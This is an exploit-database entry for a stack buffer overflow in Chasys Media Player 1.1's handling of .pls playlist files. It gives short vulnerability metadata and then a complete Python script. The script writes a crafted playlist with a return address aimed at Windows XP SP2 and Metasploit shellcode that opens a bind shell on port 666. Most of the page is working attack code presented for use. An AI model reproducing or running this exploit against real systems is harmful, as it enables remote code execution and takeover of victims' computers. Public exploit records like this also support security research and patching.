Chasys Media Player 1.1 (.pls) Stack Overflow Exploit

vendor:

Chasys Media Player

by:

Encrypt3d.M!nd

7.5

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Chasys Media Player

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

Unknown

Chasys Media Player 1.1 (.pls) Stack Overflow Exploit

This exploit is for Chasys Media Player version 1.1. It takes advantage of a stack overflow vulnerability in the program's handling of .pls files. By creating a specially crafted .pls file, an attacker can execute arbitrary code on the target system. The exploit includes a shellcode payload that launches a bind shell on port 666.

Mitigation:

Apply patches or update to a newer version of Chasys Media Player.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.


header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*260

eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2

nops = "\x90" * 20


# win32_bind -  EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")

ex = header+junk+eip+nops+shellcode
file=open("devil_inside.pls","w")
file.write(ex)
file.close()

# milw0rm.com [2009-03-18]